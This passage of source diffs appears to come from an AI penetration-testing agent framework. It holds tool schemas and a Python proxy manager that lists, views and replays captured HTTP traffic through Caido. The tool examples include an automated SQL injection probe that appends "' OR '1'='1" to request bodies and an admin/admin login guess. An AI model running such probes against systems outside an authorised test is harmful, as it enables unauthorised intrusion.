<parameter name="request_id" type="string" required="true">
<description>Request ID</description>
</parameter>
<parameter name="part" type="string" required="false">
<description>Which part to return ("request" or "response")</description>
</parameter>
<parameter name="search_pattern" type="string" required="false">
<description>Regex pattern to search content. Common patterns:
- API endpoints: r"/api/[a-zA-Z0-9._/-]+"
- URLs: r"https?://[^\\s<>"\']+"
- Parameters: r'[?&][a-zA-Z0-9_]+=([^&\\s<>"\']+)'
- Reflections: input_value in content</description>
</parameter>
<parameter name="page" type="integer" required="false">
<description>Page number for pagination</description>
</parameter>
<parameter name="page_size" type="integer" required="false">
<description>Lines per page</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>With search_pattern (COMPACT):
- 'matches': [{match, before, after, position}] - max 20
- 'total_matches': Total found
- 'truncated': If limited to 20
Without search_pattern (PAGINATION):
- 'content': Page content
- 'page': Current page
- 'showing_lines': Range display
- 'has_more': More pages available</description>
</returns>
<examples>
# Find API endpoints in response
<function=view_request>
<parameter=request_id>123</parameter>
<parameter=part>response</parameter>
<parameter=search_pattern>/api/[a-zA-Z0-9._/-]+</parameter>
</function>
</examples>
</tool>
<tool name="send_request">
<description>Send a simple HTTP request through proxy.</description>
<parameters>
<parameter name="method" type="string" required="true">
<description>HTTP method (GET, POST, etc.)</description>
</parameter>
<parameter name="url" type="string" required="true">
<description>Target URL</description>
</parameter>
<parameter name="headers" type="dict" required="false">
<description>Headers as {"key": "value"}</description>
</parameter>
<parameter name="body" type="string" required="false">
<description>Request body</description>
</parameter>
<parameter name="timeout" type="integer" required="false">
<description>Request timeout</description>
</parameter>
</parameters>
</tool>
<tool name="repeat_request">
<description>Repeat an existing proxy request with modifications for pentesting.
PROPER WORKFLOW:
1. Use browser_action to browse the target application
2. Use list_requests() to see captured proxy traffic
3. Use repeat_request() to modify and test specific requests
This mirrors real pentesting: browse → capture → modify → test</description>
<parameters>
<parameter name="request_id" type="string" required="true">
<description>ID of the original request to repeat (from list_requests)</description>
</parameter>
<parameter name="modifications" type="dict" required="false">
<description>Changes to apply to the original request:
- "url": New URL or modify existing one
- "params": Dict to update query parameters
- "headers": Dict to add/update headers
- "body": New request body (replaces original)
- "cookies": Dict to add/update cookies</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response data with status, headers, body, timing, and request details</description>
</returns>
<examples>
# Modify POST body payload
<function=repeat_request>
<parameter=request_id>req_789</parameter>
<parameter=modifications>{"body": "{\"username\":\"admin\",\"password\":\"admin\"}"}</parameter>
</function>
</examples>
</tool>
<tool name="scope_rules">
<description>Manage proxy scope patterns for domain/file filtering using Caido's scope system.</description>
<parameters>
<parameter name="action" type="string" required="true">
<description>Scope action:
- get: Get specific scope by ID or list all if no ID
- update: Update existing scope (requires scope_id and scope_name)
- list: List all available scopes
- create: Create new scope (requires scope_name)
- delete: Delete scope (requires scope_id)</description>
</parameter>
<parameter name="allowlist" type="list" required="false">
<description>Domain patterns to include. Examples: ["*.example.com", "api.test.com"]</description>
</parameter>
<parameter name="denylist" type="list" required="false">
<description>Patterns to exclude. Some common extensions:
["*.gif", "*.jpg", "*.png", "*.css", "*.js", "*.ico", "*.svg", "*woff*", "*.ttf"]</description>
</parameter>
<parameter name="scope_id" type="string" required="false">
<description>Specific scope ID to operate on (required for get, update, delete)</description>
</parameter>
<parameter name="scope_name" type="string" required="false">
<description>Name for scope (required for create, update)</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Depending on action:
- get: Single scope object or error
- list: {"scopes": [...], "count": N}
- create/update: {"scope": {...}, "message": "..."}
- delete: {"message": "...", "deletedId": "..."}</description>
</returns>
<notes>
- Empty allowlist = allow all domains
- Denylist overrides allowlist
- Glob patterns: * (any), ? (single), [abc] (one of), [a-z] (range), [^abc] (none of)
- Each scope has unique ID and can be used with list_requests(scopeId=...)
</notes>
<examples>
# Create API-only scope
<function=scope_rules>
<parameter=action>create</parameter>
<parameter=scope_name>API Testing</parameter>
<parameter=allowlist>["api.example.com", "*.api.com"]</parameter>
<parameter=denylist>["*.gif", "*.jpg", "*.png", "*.css", "*.js"]</parameter>
</function>
</examples>
</tool>
<tool name="list_sitemap">
<description>View hierarchical sitemap of discovered attack surface from proxied traffic.
Perfect for bug hunters to understand the application structure and identify
interesting endpoints, directories, and entry points discovered during testing.</description>
<parameters>
<parameter name="scope_id" type="string" required="false">
<description>Scope ID to filter sitemap entries (use scope_rules to get/create scope IDs)</description>
</parameter>
<parameter name="parent_id" type="string" required="false">
<description>ID of parent entry to expand. If None, returns root domains.</description>
</parameter>
<parameter name="depth" type="string" required="false">
<description>DIRECT: Only immediate children. ALL: All descendants recursively.</description>
</parameter>
<parameter name="page" type="integer" required="false">
<description>Page number for pagination (30 entries per page)</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing:
- 'entries': List of cleaned sitemap entries
- 'page', 'total_pages', 'total_count': Pagination info
- 'has_more': Whether more pages available
- Each entry: id, kind, label, hasDescendants, request (method/path/status only)</description>
</returns>
<notes>
Entry kinds:
- DOMAIN: Root domains (example.com)
- DIRECTORY: Path directories (/api/, /admin/)
- REQUEST: Individual endpoints
- REQUEST_BODY: POST/PUT body variations
- REQUEST_QUERY: GET parameter variations
Check hasDescendants=true to identify entries worth expanding.
Use parent_id from any entry to drill down into subdirectories.
</notes>
</tool>
<tool name="view_sitemap_entry">
<description>Get detailed information about a specific sitemap entry and related requests.
Perfect for understanding what's been discovered under a specific directory
or endpoint, including all related requests and response codes.</description>
<parameters>
<parameter name="entry_id" type="string" required="true">
<description>ID of the sitemap entry to examine</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing:
- 'entry': Complete entry details including metadata
- Entry contains 'requests' with all related HTTP requests
- Shows request methods, paths, response codes, timing</description>
</returns>
</tool>
</tools>

View File

@@ -0,0 +1,785 @@
import base64
import os
import re
import time
from typing import TYPE_CHECKING, Any
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse
import requests
from gql import Client, gql
from gql.transport.exceptions import TransportQueryError
from gql.transport.requests import RequestsHTTPTransport
from requests.exceptions import ProxyError, RequestException, Timeout
if TYPE_CHECKING:
from collections.abc import Callable
class ProxyManager:
def __init__(self, auth_token: str | None = None):
host = "127.0.0.1"
port = os.getenv("CAIDO_PORT", "56789")
self.base_url = f"http://{host}:{port}/graphql"
self.proxies = {"http": f"http://{host}:{port}", "https": f"http://{host}:{port}"}
self.auth_token = auth_token or os.getenv("CAIDO_API_TOKEN")
self.transport = RequestsHTTPTransport(
url=self.base_url, headers={"Authorization": f"Bearer {self.auth_token}"}
)
self.client = Client(transport=self.transport, fetch_schema_from_transport=False)
def list_requests(
self,
httpql_filter: str | None = None,
start_page: int = 1,
end_page: int = 1,
page_size: int = 50,
sort_by: str = "timestamp",
sort_order: str = "desc",
scope_id: str | None = None,
) -> dict[str, Any]:
offset = (start_page - 1) * page_size
limit = (end_page - start_page + 1) * page_size
sort_mapping = {
"timestamp": "CREATED_AT",
"host": "HOST",
"method": "METHOD",
"path": "PATH",
"status_code": "RESP_STATUS_CODE",
"response_time": "RESP_ROUNDTRIP_TIME",
"response_size": "RESP_LENGTH",
"source": "SOURCE",
}
query = gql("""
query GetRequests(
$limit: Int, $offset: Int, $filter: HTTPQL,
$order: RequestResponseOrderInput, $scopeId: ID
) {
requestsByOffset(
limit: $limit, offset: $offset, filter: $filter,
order: $order, scopeId: $scopeId
) {
edges {
node {
id method host path query createdAt length isTls port
source alteration fileExtension
response { id statusCode length roundtripTime createdAt }
}
}
count { value }
}
}
""")
variables = {
"limit": limit,
"offset": offset,
"filter": httpql_filter,
"order": {
"by": sort_mapping.get(sort_by, "CREATED_AT"),
"ordering": sort_order.upper(),
},
"scopeId": scope_id,
}
try:
result = self.client.execute(query, variable_values=variables)
data = result.get("requestsByOffset", {})
nodes = [edge["node"] for edge in data.get("edges", [])]
count_data = data.get("count") or {}
return {
"requests": nodes,
"total_count": count_data.get("value", 0),
"start_page": start_page,
"end_page": end_page,
"page_size": page_size,
"offset": offset,
"returned_count": len(nodes),
"sort_by": sort_by,
"sort_order": sort_order,
}
except (TransportQueryError, ValueError, KeyError) as e:
return {"requests": [], "total_count": 0, "error": f"Error fetching requests: {e}"}
def view_request(
self,
request_id: str,
part: str = "request",
search_pattern: str | None = None,
page: int = 1,
page_size: int = 50,
) -> dict[str, Any]:
queries = {
"request": """query GetRequest($id: ID!) {
request(id: $id) {
id method host path query createdAt length isTls port
source alteration edited raw
}
}""",
"response": """query GetRequest($id: ID!) {
request(id: $id) {
id response {
id statusCode length roundtripTime createdAt raw
}
}
}""",
}
if part not in queries:
return {"error": f"Invalid part '{part}'. Use 'request' or 'response'"}
try:
result = self.client.execute(gql(queries[part]), variable_values={"id": request_id})
request_data = result.get("request", {})
if not request_data:
return {"error": f"Request {request_id} not found"}
if part == "request":
raw_content = request_data.get("raw")
else:
response_data = request_data.get("response") or {}
raw_content = response_data.get("raw")
if not raw_content:
return {"error": "No content available"}
content = base64.b64decode(raw_content).decode("utf-8", errors="replace")
if part == "response":
request_data["response"]["raw"] = content
else:
request_data["raw"] = content
return (
self._search_content(request_data, content, search_pattern)
if search_pattern
else self._paginate_content(request_data, content, page, page_size)
)
except (TransportQueryError, ValueError, KeyError, UnicodeDecodeError) as e:
return {"error": f"Failed to view request: {e}"}
def _search_content(
self, request_data: dict[str, Any], content: str, pattern: str
) -> dict[str, Any]:
try:
regex = re.compile(pattern, re.IGNORECASE | re.MULTILINE | re.DOTALL)
matches = []
for match in regex.finditer(content):
start, end = match.start(), match.end()
context_size = 120
before = re.sub(r"\s+", " ", content[max(0, start - context_size) : start].strip())[
-100:
]
after = re.sub(r"\s+", " ", content[end : end + context_size].strip())[:100]
matches.append(
{"match": match.group(), "before": before, "after": after, "position": start}
)
if len(matches) >= 20:
break
return {
"id": request_data.get("id"),
"matches": matches,
"total_matches": len(matches),
"search_pattern": pattern,
"truncated": len(matches) >= 20,
}
except re.error as e:
return {"error": f"Invalid regex: {e}"}
def _paginate_content(
self, request_data: dict[str, Any], content: str, page: int, page_size: int
) -> dict[str, Any]:
display_lines = []
for line in content.split("\n"):
if len(line) <= 80:
display_lines.append(line)
else:
display_lines.extend(
[
line[i : i + 80] + (" \\" if i + 80 < len(line) else "")
for i in range(0, len(line), 80)
]
)
total_lines = len(display_lines)
total_pages = (total_lines + page_size - 1) // page_size
page = max(1, min(page, total_pages))
start_line = (page - 1) * page_size
end_line = min(total_lines, start_line + page_size)
return {
"id": request_data.get("id"),
"content": "\n".join(display_lines[start_line:end_line]),
"page": page,
"total_pages": total_pages,
"showing_lines": f"{start_line + 1}-{end_line} of {total_lines}",
"has_more": page < total_pages,
}
def send_simple_request(
self,
method: str,
url: str,
headers: dict[str, str] | None = None,
body: str = "",
timeout: int = 30,
) -> dict[str, Any]:
if headers is None:
headers = {}
try:
start_time = time.time()
response = requests.request(
method=method,
url=url,
headers=headers,
data=body or None,
proxies=self.proxies,
timeout=timeout,
verify=False,
)
response_time = int((time.time() - start_time) * 1000)
body_content = response.text
if len(body_content) > 10000:
body_content = body_content[:10000] + "\n... [truncated]"
return {
"status_code": response.status_code,
"headers": dict(response.headers),
"body": body_content,
"response_time_ms": response_time,
"url": response.url,
"message": (
"Request sent through proxy - check list_requests() for captured traffic"
),
}
except (RequestException, ProxyError, Timeout) as e:
return {"error": f"Request failed: {type(e).__name__}", "details": str(e), "url": url}
def repeat_request(
self, request_id: str, modifications: dict[str, Any] | None = None
) -> dict[str, Any]:
if modifications is None:
modifications = {}
original = self.view_request(request_id, "request")
if "error" in original:
return {"error": f"Could not retrieve original request: {original['error']}"}
raw_content = original.get("content", "")
if not raw_content:
return {"error": "No raw request content found"}
request_components = self._parse_http_request(raw_content)
if "error" in request_components:
return request_components
full_url = self._build_full_url(request_components, modifications)
if "error" in full_url:
return full_url
modified_request = self._apply_modifications(
request_components, modifications, full_url["url"]
)
return self._send_modified_request(modified_request, request_id, modifications)
def _parse_http_request(self, raw_content: str) -> dict[str, Any]:
lines = raw_content.split("\n")
request_line = lines[0].strip().split(" ")
if len(request_line) < 2:
return {"error": "Invalid request line format"}
method, url_path = request_line[0], request_line[1]
headers = {}
body_start = 0
for i, line in enumerate(lines[1:], 1):
if line.strip() == "":
body_start = i + 1
break
if ":" in line:
key, value = line.split(":", 1)
headers[key.strip()] = value.strip()
body = "\n".join(lines[body_start:]).strip() if body_start < len(lines) else ""
return {"method": method, "url_path": url_path, "headers": headers, "body": body}
def _build_full_url(
self, components: dict[str, Any], modifications: dict[str, Any]
) -> dict[str, Any]:
headers = components["headers"]
host = headers.get("Host", "")
if not host:
return {"error": "No Host header found"}
protocol = (
"https" if ":443" in host or "https" in headers.get("Referer", "").lower() else "http"
)
full_url = f"{protocol}://{host}{components['url_path']}"
if "url" in modifications:
full_url = modifications["url"]
return {"url": full_url}
def _apply_modifications(
self, components: dict[str, Any], modifications: dict[str, Any], full_url: str
) -> dict[str, Any]:
headers = components["headers"].copy()
body = components["body"]
final_url = full_url
if "params" in modifications:
parsed = urlparse(final_url)
params = {k: v[0] if v else "" for k, v in parse_qs(parsed.query).items()}
params.update(modifications["params"])
final_url = urlunparse(parsed._replace(query=urlencode(params)))
if "headers" in modifications:
headers.update(modifications["headers"])
if "body" in modifications:
body = modifications["body"]
if "cookies" in modifications:
cookies = {}
if headers.get("Cookie"):
for cookie in headers["Cookie"].split(";"):
if "=" in cookie:
k, v = cookie.split("=", 1)
cookies[k.strip()] = v.strip()
cookies.update(modifications["cookies"])
headers["Cookie"] = "; ".join([f"{k}={v}" for k, v in cookies.items()])
return {
"method": components["method"],
"url": final_url,
"headers": headers,
"body": body,
}
def _send_modified_request(
self, request_data: dict[str, Any], request_id: str, modifications: dict[str, Any]
) -> dict[str, Any]:
try:
start_time = time.time()
response = requests.request(
method=request_data["method"],
url=request_data["url"],
headers=request_data["headers"],
data=request_data["body"] or None,
proxies=self.proxies,
timeout=30,
verify=False,
)
response_time = int((time.time() - start_time) * 1000)
response_body = response.text
truncated = len(response_body) > 10000
if truncated:
response_body = response_body[:10000] + "\n... [truncated]"
return {
"status_code": response.status_code,
"status_text": response.reason,
"headers": {
k: v
for k, v in response.headers.items()
if k.lower()
in ["content-type", "content-length", "server", "set-cookie", "location"]
},
"body": response_body,
"body_truncated": truncated,
"body_size": len(response.content),
"response_time_ms": response_time,
"url": response.url,
"original_request_id": request_id,
"modifications_applied": modifications,
"request": {
"method": request_data["method"],
"url": request_data["url"],
"headers": request_data["headers"],
"has_body": bool(request_data["body"]),
},
}
except ProxyError as e:
return {
"error": "Proxy connection failed - is Caido running?",
"details": str(e),
"original_request_id": request_id,
}
except (RequestException, Timeout) as e:
return {
"error": f"Failed to repeat request: {type(e).__name__}",
"details": str(e),
"original_request_id": request_id,
}
def _handle_scope_list(self) -> dict[str, Any]:
result = self.client.execute(gql("query { scopes { id name allowlist denylist indexed } }"))
scopes = result.get("scopes", [])
return {"scopes": scopes, "count": len(scopes)}
def _handle_scope_get(self, scope_id: str | None) -> dict[str, Any]:
if not scope_id:
return self._handle_scope_list()
result = self.client.execute(
gql(
"query GetScope($id: ID!) { scope(id: $id) { id name allowlist denylist indexed } }"
),
variable_values={"id": scope_id},
)
scope = result.get("scope")
if not scope:
return {"error": f"Scope {scope_id} not found"}
return {"scope": scope}
def _handle_scope_create(
self, scope_name: str, allowlist: list[str] | None, denylist: list[str] | None
) -> dict[str, Any]:
if not scope_name:
return {"error": "scope_name required for create"}
mutation = gql("""
mutation CreateScope($input: CreateScopeInput!) {
createScope(input: $input) {
scope { id name allowlist denylist indexed }
error {
... on InvalidGlobTermsUserError { code terms }
... on OtherUserError { code }
}
}
}
""")
result = self.client.execute(
mutation,
variable_values={
"input": {
"name": scope_name,
"allowlist": allowlist or [],
"denylist": denylist or [],
}
},
)
payload = result.get("createScope", {})
if payload.get("error"):
error = payload["error"]
return {"error": f"Invalid glob patterns: {error.get('terms', error.get('code'))}"}
return {"scope": payload.get("scope"), "message": "Scope created successfully"}
def _handle_scope_update(
self,
scope_id: str,
scope_name: str,
allowlist: list[str] | None,
denylist: list[str] | None,
) -> dict[str, Any]:
if not scope_id or not scope_name:
return {"error": "scope_id and scope_name required"}
mutation = gql("""
mutation UpdateScope($id: ID!, $input: UpdateScopeInput!) {
updateScope(id: $id, input: $input) {
scope { id name allowlist denylist indexed }
error {
... on InvalidGlobTermsUserError { code terms }
... on OtherUserError { code }
}
}
}
""")
result = self.client.execute(
mutation,
variable_values={
"id": scope_id,
"input": {
"name": scope_name,
"allowlist": allowlist or [],
"denylist": denylist or [],
},
},
)
payload = result.get("updateScope", {})
if payload.get("error"):
error = payload["error"]
return {"error": f"Invalid glob patterns: {error.get('terms', error.get('code'))}"}
return {"scope": payload.get("scope"), "message": "Scope updated successfully"}
def _handle_scope_delete(self, scope_id: str) -> dict[str, Any]:
if not scope_id:
return {"error": "scope_id required for delete"}
result = self.client.execute(
gql("mutation DeleteScope($id: ID!) { deleteScope(id: $id) { deletedId } }"),
variable_values={"id": scope_id},
)
payload = result.get("deleteScope", {})
if not payload.get("deletedId"):
return {"error": f"Failed to delete scope {scope_id}"}
return {"message": f"Scope {scope_id} deleted", "deletedId": payload["deletedId"]}
def scope_rules(
self,
action: str,
allowlist: list[str] | None = None,
denylist: list[str] | None = None,
scope_id: str | None = None,
scope_name: str | None = None,
) -> dict[str, Any]:
handlers: dict[str, Callable[[], dict[str, Any]]] = {
"list": self._handle_scope_list,
"get": lambda: self._handle_scope_get(scope_id),
"create": lambda: (
{"error": "scope_name required for create"}
if not scope_name
else self._handle_scope_create(scope_name, allowlist, denylist)
),
"update": lambda: (
{"error": "scope_id and scope_name required"}
if not scope_id or not scope_name
else self._handle_scope_update(scope_id, scope_name, allowlist, denylist)
),
"delete": lambda: (
{"error": "scope_id required for delete"}
if not scope_id
else self._handle_scope_delete(scope_id)
),
}
handler = handlers.get(action)
if not handler:
return {
"error": f"Unsupported action: {action}. Use 'get', 'list', 'create', "
f"'update', or 'delete'"
}
try:
result = handler()
except (TransportQueryError, ValueError, KeyError) as e:
return {"error": f"Scope operation failed: {e}"}
else:
return result
def list_sitemap(
self,
scope_id: str | None = None,
parent_id: str | None = None,
depth: str = "DIRECT",
page: int = 1,
page_size: int = 30,
) -> dict[str, Any]:
try:
skip_count = (page - 1) * page_size
if parent_id:
query = gql("""
query GetSitemapDescendants($parentId: ID!, $depth: SitemapDescendantsDepth!) {
sitemapDescendantEntries(parentId: $parentId, depth: $depth) {
edges {
node {
id kind label hasDescendants
request { method path response { statusCode } }
}
}
count { value }
}
}
""")
result = self.client.execute(
query, variable_values={"parentId": parent_id, "depth": depth}
)
data = result.get("sitemapDescendantEntries", {})
else:
query = gql("""
query GetSitemapRoots($scopeId: ID) {
sitemapRootEntries(scopeId: $scopeId) {
edges { node {
id kind label hasDescendants
metadata { ... on SitemapEntryMetadataDomain { isTls port } }
request { method path response { statusCode } }
} }
count { value }
}
}
""")
result = self.client.execute(query, variable_values={"scopeId": scope_id})
data = result.get("sitemapRootEntries", {})
all_nodes = [edge["node"] for edge in data.get("edges", [])]
count_data = data.get("count") or {}
total_count = count_data.get("value", 0)
paginated_nodes = all_nodes[skip_count : skip_count + page_size]
cleaned_nodes = []
for node in paginated_nodes:
cleaned = {
"id": node["id"],
"kind": node["kind"],
"label": node["label"],
"hasDescendants": node["hasDescendants"],
}
if node.get("metadata") and (
node["metadata"].get("isTls") is not None or node["metadata"].get("port")
):
cleaned["metadata"] = node["metadata"]
if node.get("request"):
req = node["request"]
cleaned_req = {}
if req.get("method"):
cleaned_req["method"] = req["method"]
if req.get("path"):
cleaned_req["path"] = req["path"]
response_data = req.get("response") or {}
if response_data.get("statusCode"):
cleaned_req["status"] = response_data["statusCode"]
if cleaned_req:
cleaned["request"] = cleaned_req
cleaned_nodes.append(cleaned)
total_pages = (total_count + page_size - 1) // page_size
return {
"entries": cleaned_nodes,
"page": page,
"page_size": page_size,
"total_pages": total_pages,
"total_count": total_count,
"has_more": page < total_pages,
"showing": (
f"{skip_count + 1}-{min(skip_count + page_size, total_count)} of {total_count}"
),
}
except (TransportQueryError, ValueError, KeyError) as e:
return {"error": f"Failed to fetch sitemap: {e}"}
def _process_sitemap_metadata(self, node: dict[str, Any]) -> dict[str, Any]:
cleaned = {
"id": node["id"],
"kind": node["kind"],
"label": node["label"],
"hasDescendants": node["hasDescendants"],
}
if node.get("metadata") and (
node["metadata"].get("isTls") is not None or node["metadata"].get("port")
):
cleaned["metadata"] = node["metadata"]
return cleaned
def _process_sitemap_request(self, req: dict[str, Any]) -> dict[str, Any] | None:
cleaned_req = {}
if req.get("method"):
cleaned_req["method"] = req["method"]
if req.get("path"):
cleaned_req["path"] = req["path"]
response_data = req.get("response") or {}
if response_data.get("statusCode"):
cleaned_req["status"] = response_data["statusCode"]
return cleaned_req if cleaned_req else None
def _process_sitemap_response(self, resp: dict[str, Any]) -> dict[str, Any]:
cleaned_resp = {}
if resp.get("statusCode"):
cleaned_resp["status"] = resp["statusCode"]
if resp.get("length"):
cleaned_resp["size"] = resp["length"]
if resp.get("roundtripTime"):
cleaned_resp["time_ms"] = resp["roundtripTime"]
return cleaned_resp
def view_sitemap_entry(self, entry_id: str) -> dict[str, Any]:
try:
query = gql("""
query GetSitemapEntry($id: ID!) {
sitemapEntry(id: $id) {
id kind label hasDescendants
metadata { ... on SitemapEntryMetadataDomain { isTls port } }
request { method path response { statusCode length roundtripTime } }
requests(first: 30, order: {by: CREATED_AT, ordering: DESC}) {
edges { node { method path response { statusCode length } } }
count { value }
}
}
}
""")
result = self.client.execute(query, variable_values={"id": entry_id})
entry = result.get("sitemapEntry")
if not entry:
return {"error": f"Sitemap entry {entry_id} not found"}
cleaned = self._process_sitemap_metadata(entry)
if entry.get("request"):
req = entry["request"]
cleaned_req = {}
if req.get("method"):
cleaned_req["method"] = req["method"]
if req.get("path"):
cleaned_req["path"] = req["path"]
if req.get("response"):
cleaned_req["response"] = self._process_sitemap_response(req["response"])
if cleaned_req:
cleaned["request"] = cleaned_req
requests_data = entry.get("requests", {})
request_nodes = [edge["node"] for edge in requests_data.get("edges", [])]
cleaned_requests = [
req
for req in (self._process_sitemap_request(node) for node in request_nodes)
if req is not None
]
count_data = requests_data.get("count") or {}
cleaned["related_requests"] = {
"requests": cleaned_requests,
"total_count": count_data.get("value", 0),
"showing": f"Latest {len(cleaned_requests)} requests",
}
return {"entry": cleaned} if cleaned else {"error": "Failed to process sitemap entry"} # noqa: TRY300
except (TransportQueryError, ValueError, KeyError) as e:
return {"error": f"Failed to fetch sitemap entry: {e}"}
def close(self) -> None:
pass
_PROXY_MANAGER: ProxyManager | None = None
def get_proxy_manager() -> ProxyManager:
if _PROXY_MANAGER is None:
return ProxyManager()
return _PROXY_MANAGER

View File

@@ -0,0 +1,4 @@
from .python_actions import python_action
__all__ = ["python_action"]

View File

@@ -0,0 +1,47 @@
from typing import Any, Literal
from strix.tools.registry import register_tool
from .python_manager import get_python_session_manager
PythonAction = Literal["new_session", "execute", "close", "list_sessions"]
@register_tool
def python_action(
action: PythonAction,
code: str | None = None,
timeout: int = 30,
session_id: str | None = None,
) -> dict[str, Any]:
def _validate_code(action_name: str, code: str | None) -> None:
if not code:
raise ValueError(f"code parameter is required for {action_name} action")
def _validate_action(action_name: str) -> None:
raise ValueError(f"Unknown action: {action_name}")
manager = get_python_session_manager()
try:
match action:
case "new_session":
return manager.create_session(session_id, code, timeout)
case "execute":
_validate_code(action, code)
assert code is not None
return manager.execute_code(session_id, code, timeout)
case "close":
return manager.close_session(session_id)
case "list_sessions":
return manager.list_sessions()
case _:
_validate_action(action) # type: ignore[unreachable]
except (ValueError, RuntimeError) as e:
return {"stderr": str(e), "session_id": session_id, "stdout": "", "is_running": False}

View File

@@ -0,0 +1,131 @@
<?xml version="1.0" encoding="UTF-8"?>
<tools>
<tool name="python_action">
<description>Perform Python actions using persistent interpreter sessions for cybersecurity tasks.</description>
<details>Common Use Cases:
- Security script development and testing (payload generation, exploit scripts)
- Data analysis of security logs, network traffic, or vulnerability scans
- Cryptographic operations and security tool automation
- Interactive penetration testing workflows and proof-of-concept development
- Processing security data formats (JSON, XML, CSV from security tools)
- HTTP proxy interaction for web security testing (all proxy functions are pre-imported)
Each session instance is PERSISTENT and maintains its own global and local namespaces
until explicitly closed, allowing for multi-step security workflows and stateful computations.
PROXY FUNCTIONS PRE-IMPORTED:
All proxy action functions are automatically imported into every Python session, enabling
seamless HTTP traffic analysis and web security testing
This is particularly useful for:
- Analyzing captured HTTP traffic during web application testing
- Automating request manipulation and replay attacks
- Building custom security testing workflows combining proxy data with Python analysis
- Correlating multiple requests for advanced attack scenarios</details>
<parameters>
<parameter name="action" type="string" required="true">
<description>The Python action to perform: - new_session: Create a new Python interpreter session. This MUST be the first action for each session. - execute: Execute Python code in the specified session. - close: Close the specified session instance. - list_sessions: List all active Python sessions.</description>
</parameter>
<parameter name="code" type="string" required="false">
<description>Required for 'new_session' (as initial code) and 'execute' actions. The Python code to execute.</description>
</parameter>
<parameter name="timeout" type="integer" required="false">
<description>Maximum execution time in seconds for code execution. Applies to both 'new_session' (when initial code is provided) and 'execute' actions. Default is 30 seconds.</description>
</parameter>
<parameter name="session_id" type="string" required="false">
<description>Unique identifier for the Python session. If not provided, uses the default session ID.</description>
</parameter>
</parameters>
<returns type="Dict[str, Any]">
<description>Response containing: - session_id: the ID of the session that was operated on - stdout: captured standard output from code execution (for execute action) - stderr: any error message if execution failed - result: string representation of the last expression result - execution_time: time taken to execute the code - message: status message about the action performed - Various session info depending on the action</description>
</returns>
<notes>
Important usage rules:
1. PERSISTENCE: Session instances remain active and maintain their state (variables,
imports, function definitions) until explicitly closed with the 'close' action.
This allows for multi-step workflows across multiple tool calls.
2. MULTIPLE SESSIONS: You can run multiple Python sessions concurrently by using
different session_id values. Each session operates independently with its own
namespace.
3. Session interaction MUST begin with 'new_session' action for each session instance.
4. Only one action can be performed per call.
5. CODE EXECUTION:
- Both expressions and statements are supported
- Expressions automatically return their result
- Print statements and stdout are captured
- Variables persist between executions in the same session
- Imports, function definitions, etc. persist in the session
- IPython magic commands are fully supported (%pip, %time, %whos, %%writefile, etc.)
- Line magics (%) and cell magics (%%) work as expected
6. CLOSE: Terminates the session completely and frees memory
7. The Python sessions can operate concurrently with other tools. You may invoke
terminal, browser, or other tools while maintaining active Python sessions.
8. Each session has its own isolated namespace - variables in one session don't
affect others.
</notes>
<examples>
# Create new session for security analysis (default session)
<function=python_action>
<parameter=action>new_session</parameter>
<parameter=code>import hashlib
import base64
import json
print("Security analysis session started")</parameter>
</function>
# Analyze security data in the default session
<function=python_action>
<parameter=action>execute</parameter>
<parameter=code>vulnerability_data = {"cve": "CVE-2024-1234", "severity": "high"}
encoded_payload = base64.b64encode(json.dumps(vulnerability_data).encode())
print(f"Encoded: {encoded_payload.decode()}")</parameter>
</function>
# Long running security scan with custom timeout
<function=python_action>
<parameter=action>execute</parameter>
<parameter=code>import time
# Simulate long-running vulnerability scan
time.sleep(45)
print('Security scan completed!')</parameter>
<parameter=timeout>50</parameter>
</function>
# Use IPython magic commands for package management and profiling
<function=python_action>
<parameter=action>execute</parameter>
<parameter=code>%pip install requests
%time response = requests.get('https://httpbin.org/json')
%whos</parameter>
# Analyze requests for potential vulnerabilities
<function=python_action>
<parameter=action>execute</parameter>
<parameter=code># Filter for POST requests that might contain sensitive data
post_requests = list_requests(
httpql_filter="req.method.eq:POST",
page_size=20
)
# Analyze each POST request for potential issues
for req in post_requests.get('requests', []):
request_id = req['id']
# View the request details
request_details = view_request(request_id, part="request")
# Check for potential SQL injection points
body = request_details.get('body', '')
if any(keyword in body.lower() for keyword in ['select', 'union', 'insert', 'update']):
print(f"Potential SQL injection in request {request_id}")
# Repeat the request with a test payload
test_payload = repeat_request(request_id, {
'body': body + "' OR '1'='1"
})
print(f"Test response status: {test_payload.get('status_code')}")
print("Security analysis complete!")</parameter>
</function>
</examples>
</tool>
</tools>

View File

@@ -0,0 +1,172 @@
import io
import signal
import sys
import threading
from typing import Any
from IPython.core.interactiveshell import InteractiveShell
MAX_STDOUT_LENGTH = 10_000
MAX_STDERR_LENGTH = 5_000
class PythonInstance:
def __init__(self, session_id: str) -> None:
self.session_id = session_id
self.is_running = True
self._execution_lock = threading.Lock()
import os
os.chdir("/workspace")
self.shell = InteractiveShell()
self.shell.init_completer()
self.shell.init_history()
self.shell.init_logger()
self._setup_proxy_functions()
def _setup_proxy_functions(self) -> None:
try:
from strix.tools.proxy import proxy_actions
proxy_functions = [
"list_requests",
"list_sitemap",
"repeat_request",
"scope_rules",
"send_request",
"view_request",
"view_sitemap_entry",
]
proxy_dict = {name: getattr(proxy_actions, name) for name in proxy_functions}
self.shell.user_ns.update(proxy_dict)
except ImportError:
pass
def _validate_session(self) -> dict[str, Any] | None:
if not self.is_running:
return {
"session_id": self.session_id,
"stdout": "",
"stderr": "Session is not running",
"result": None,
}
return None
def _setup_execution_environment(self, timeout: int) -> tuple[Any, io.StringIO, io.StringIO]:
stdout_capture = io.StringIO()
stderr_capture = io.StringIO()
def timeout_handler(signum: int, frame: Any) -> None:
raise TimeoutError(f"Code execution timed out after {timeout} seconds")
old_handler = signal.signal(signal.SIGALRM, timeout_handler)
signal.alarm(timeout)
sys.stdout = stdout_capture
sys.stderr = stderr_capture
return old_handler, stdout_capture, stderr_capture
def _cleanup_execution_environment(
self, old_handler: Any, old_stdout: Any, old_stderr: Any
) -> None:
signal.signal(signal.SIGALRM, old_handler)
sys.stdout = old_stdout
sys.stderr = old_stderr
def _truncate_output(self, content: str, max_length: int, suffix: str) -> str:
if len(content) > max_length:
return content[:max_length] + suffix
return content
def _format_execution_result(
